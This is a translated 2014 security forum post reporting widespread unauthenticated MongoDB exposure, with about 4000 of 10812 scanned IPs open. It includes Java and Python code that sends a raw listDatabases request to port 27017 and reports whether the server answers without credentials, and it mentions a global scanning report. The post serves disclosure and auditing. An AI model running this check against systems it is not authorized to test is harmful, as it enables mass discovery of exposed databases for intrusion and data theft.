Mongodb unauthorized access (WOOYUN)

Category: WooYun-Zone

园长 (喵~) | Mongodb unauthorized access (WOOYUN) | 2014-12-21 23:09

Mongodb does not require auth to be configured by default, and the resulting unauthorized-access problem is worrying.
The year before last I wrote a Mongodb unauthorized-access scanning tool and found unauthorized-access problems at some companies' Mongodb instances (testing turned up some game companies among them), but in terms of numbers it was not yet too serious.
Recently the Mongodb problem has grown worse and worse: when probing 10812 domestic IPs last week, I found close to 4000 IPs with unauthorized access.

Vulnerability verification method:
Using mongo-java-driver-2.12.4.jar:
MongoClient client = new MongoClient(host,port);
Or:
import java.io.ByteArrayOutputStream;
import java.io.InputStream;
import java.io.OutputStream;
import java.net.InetSocketAddress;
import java.net.Socket;
import java.nio.charset.StandardCharsets;

public class MongoUnauthCheck {
  // Returns true when an unauthenticated listDatabases on admin.$cmd is answered with the database list.
  private boolean loginTest(String host, int timeout) {
    // Raw OP_QUERY (opcode 2004, 63 bytes) on admin.$cmd carrying the BSON document {listDatabases: 1}.
    byte[] b = new byte[]{0x3f,0x00,0x00,0x00,(byte) 0x97,0x75,(byte) 0xbc,0x60,(byte) 0xff,(byte) 0xff,(byte) 0xff,(byte) 0xff,(byte) 0xd4,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x61,0x64,0x6d,0x69,0x6e,0x2e,0x24,0x63,0x6d,0x64,0x00,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x18,0x00,0x00,0x00,0x10,0x6c,0x69,0x73,0x74,0x44,0x61,0x74,0x61,0x62,0x61,0x73,0x65,0x73,0x00,0x01,0x00,0x00,0x00,0x00};
    try (Socket socket = new Socket()) {
      socket.connect(new InetSocketAddress(host, 27017), timeout);
      socket.setSoTimeout(timeout);
      OutputStream out = socket.getOutputStream();
      out.write(b);
      out.flush();
      socket.shutdownOutput(); // half-close so mongod sends its reply and then closes the connection
      // The OP_REPLY is binary BSON, so collect raw bytes until EOF instead of reading text lines.
      InputStream in = socket.getInputStream();
      ByteArrayOutputStream reply = new ByteArrayOutputStream();
      byte[] buf = new byte[4096];
      int n;
      while ((n = in.read(buf)) != -1) {
        reply.write(buf, 0, n);
      }
      // Every mongod has a "local" database, so its name in the reply means the listing succeeded without credentials.
      return reply.toString(StandardCharsets.ISO_8859_1.name()).contains("local");
    } catch (Exception e) {
      return false; // connection refused, timed out, or not a MongoDB service
    }
  }
}
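To make the check above explicit for an audit of your own instances, here is an added example (not from the original post) that builds the same OP_QUERY from its fields rather than a hard-coded byte array, and classifies the server's OP_REPLY: a reply carrying the database list means the instance accepts commands with no credentials, while a "not authorized" error (MongoDB error code 13) means auth is enforced. The minimal BSON encoder/decoder, and the sample replies used to exercise it, are constructed for this example.

```python
import struct

OP_REPLY, OP_QUERY = 1, 2004   # MongoDB wire-protocol opcodes
UNAUTHORIZED = 13              # MongoDB error code returned when auth is enforced
def _cstr(s): return s.encode() + b"\x00"
def bson_doc(fields):
    """Minimal BSON encoder: float -> double, int -> int32, str -> string, dict -> document, list -> array."""
    body = b""
    for k, v in fields.items():
        if isinstance(v, float):
            body += b"\x01" + _cstr(k) + struct.pack("<d", v)
        elif isinstance(v, int):
            body += b"\x10" + _cstr(k) + struct.pack("<i", v)
        elif isinstance(v, str):
            body += b"\x02" + _cstr(k) + struct.pack("<i", len(_cstr(v))) + _cstr(v)
        else:  # an array is a document whose keys are "0", "1", ...
            sub = v if isinstance(v, dict) else {str(i): x for i, x in enumerate(v)}
            body += (b"\x03" if isinstance(v, dict) else b"\x04") + _cstr(k) + bson_doc(sub)
    return struct.pack("<i", len(body) + 5) + body + b"\x00"
def bson_decode(buf):
    """Decode the same subset (arrays come back as dicts keyed "0", "1", ...); anything else raises."""
    doc, pos = {}, 4
    while buf[pos] != 0:                                   # 0x00 terminates the document
        t, key_end = buf[pos], buf.index(b"\x00", pos + 1)
        key, pos = buf[pos + 1:key_end].decode(), key_end + 1
        n = struct.unpack_from("<i", buf, pos)[0]          # int32 value, or length prefix of string/doc/array
        if t == 0x01:
            doc[key], pos = struct.unpack_from("<d", buf, pos)[0], pos + 8
        elif t == 0x10:
            doc[key], pos = n, pos + 4
        elif t == 0x02:
            doc[key], pos = buf[pos + 4:pos + 3 + n].decode(), pos + 4 + n
        elif t in (0x03, 0x04):
            doc[key], pos = bson_decode(buf[pos:pos + n]), pos + n
        else:
            raise ValueError(f"unsupported BSON type 0x{t:02x}")
    return doc
def build_list_databases(request_id, response_to=-1):
    """OP_QUERY on admin.$cmd carrying {listDatabases: 1}; the post's byte array is this message for request_id 0x60bc7597."""
    body = struct.pack("<i", 0) + _cstr("admin.$cmd") + struct.pack("<ii", 0, 1) + bson_doc({"listDatabases": 1})
    return struct.pack("<iiii", 16 + len(body), request_id, response_to, OP_QUERY) + body
def classify_reply(data):
    """'auth-required' if the server refused, 'open' if listDatabases succeeded with no credentials, else 'unknown'."""
    length, _, _, opcode = struct.unpack_from("<iiii", data)
    if opcode != OP_REPLY or length != len(data): raise ValueError("not a complete OP_REPLY")
    first = bson_decode(data[36:]) if struct.unpack_from("<i", data, 32)[0] > 0 else {}  # numberReturned @32, docs @36
    if first.get("code") == UNAUTHORIZED or "not authorized" in str(first.get("errmsg", "")):
        return "auth-required"
    return "open" if first.get("ok") == 1.0 and "databases" in first else "unknown"
```

An instance that answers "open" to this message is the condition the post's scan counts as unauthorized access; enabling auth makes the same request come back as "auth-required".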

There also seems to be a "Global Mongodb unauthorized access probing report" from the Evil Red team that likewise shows how serious the problem is:
Mongodb unauthorized access vulnerability global probing report
[+] Author: f1,2,4
[+] Team: FF0000 TEAM <http://www.ff0000.cc>
[+] From: HackerSoul <http://www.hackersoul.com>
[+] Create: 2014-12-10
Introduction
Domain list
Proof of Concept
Scan results
IP location
Evil hackers
